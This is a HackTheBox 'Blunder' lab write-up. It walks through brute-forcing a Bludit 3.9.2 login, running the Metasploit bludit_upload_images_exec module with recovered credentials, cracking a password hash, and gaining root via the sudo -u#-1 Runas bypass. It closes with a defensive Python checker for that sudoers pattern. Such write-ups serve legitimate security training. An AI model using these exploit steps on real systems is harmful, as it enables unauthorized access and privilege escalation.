HackTheBox — Blunder
--
Summary
Another Linux machine has been retired, with IP 10.10.10.191.
Let's get started!
Enumeration
Nmap
Only one port is open, 80, so nothing of particular interest.
Web Enum
I fuzzed directories with dirb and found the admin/login page.
Exploit
Looking at the page source, I found Bludit version 3.9.2.
So I searched for CVEs affecting this version and found CVE-2019-16113 and CVE-2019-17240, along with a Python script (Bruteforce) to run a brute-force attack against the login:
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
The exploit for the first CVE is available in Metasploit:
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhost 10.10.10.191
rhost => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set rport 80
rport => 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
Get user access
I didn't find the user flag, but I found user credentials in users.php.
Now we have a password hash, which needs to be cracked; I used hashcat with the rockyou.txt wordlist and got the password: Password120
Then I tried to get access as hugo with these credentials.
Gain user flag!
Privilege Escalation
After some searching about the sudoers entry (ALL, !root) /bin/bash,
I found this link: https://n0w4n.nl/sudo-security-bypass/
So I tried to get root with the command: sudo -u#-1 /bin/bash
Gain root flag!
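As an added defender-side check (example code of my own, not from this write-up, Bludit or the sudo project), the following Python audits a sudoers file for the blocklist-style Runas entry seen above and compares the installed sudo version with the upstream release that rejects a uid of -1 (1.8.28); the sudoers line and the sudo -V string it runs on are constructed samples.

```python
import re
from typing import List, Tuple

# Matches a sudoers rule of the form:  who  host = (runas_users[:runas_groups]) [TAGS:] commands
RULE_RE = re.compile(
    r"^\s*(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+?)\s*$"
)

# First upstream sudo release where "sudo -u#-1" is rejected instead of mapped to uid 0.
FIXED_VERSION = (1, 8, 28)


def negated_root_rules(sudoers_text: str) -> List[Tuple[str, str]]:
    """Return (who, commands) for every rule whose Runas list is "ALL minus root".

    Such a rule is a blocklist: it accepts any runas user except root, so it only
    holds if sudo validates the requested uid. Allow-listing the intended runas
    user (e.g. "(www-data)") removes the problem regardless of sudo version.
    """
    findings = []
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0]          # drop comments
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = m.group("runas").split(":", 1)[0]   # ignore the group part
        names = [n.strip() for n in runas_users.split(",") if n.strip()]
        if "ALL" in names and "!root" in names:
            findings.append((m.group("who"), m.group("cmds")))
    return findings


def parse_sudo_version(sudo_v_output: str) -> Tuple[int, ...]:
    """Extract the numeric version from the first line of `sudo -V` (e.g. 1.8.25p1 -> (1, 8, 25))."""
    m = re.search(r"Sudo version (\d+(?:\.\d+)+)", sudo_v_output)
    if not m:
        raise ValueError("could not find a version in sudo -V output")
    return tuple(int(x) for x in m.group(1).split("."))


def runas_bypass_possible(sudoers_text: str, sudo_v_output: str) -> bool:
    """True when a '(ALL, !root)' rule exists AND sudo is older than the fixed release."""
    return bool(negated_root_rules(sudoers_text)) and parse_sudo_version(sudo_v_output) < FIXED_VERSION


if __name__ == "__main__":
    # Constructed sample input: a rule like the one in the write-up and an old sudo banner.
    SAMPLE_SUDOERS = "hugo ALL=(ALL, !root) /bin/bash\n"
    SAMPLE_SUDO_V = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"
    for who, cmds in negated_root_rules(SAMPLE_SUDOERS):
        print(f"blocklist Runas rule for {who}: {cmds} -> allow-list the runas user instead")
    print("bypass possible:", runas_bypass_possible(SAMPLE_SUDOERS, SAMPLE_SUDO_V))
```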
If you learned anything useful from this write-up, respect me on HackTheBox.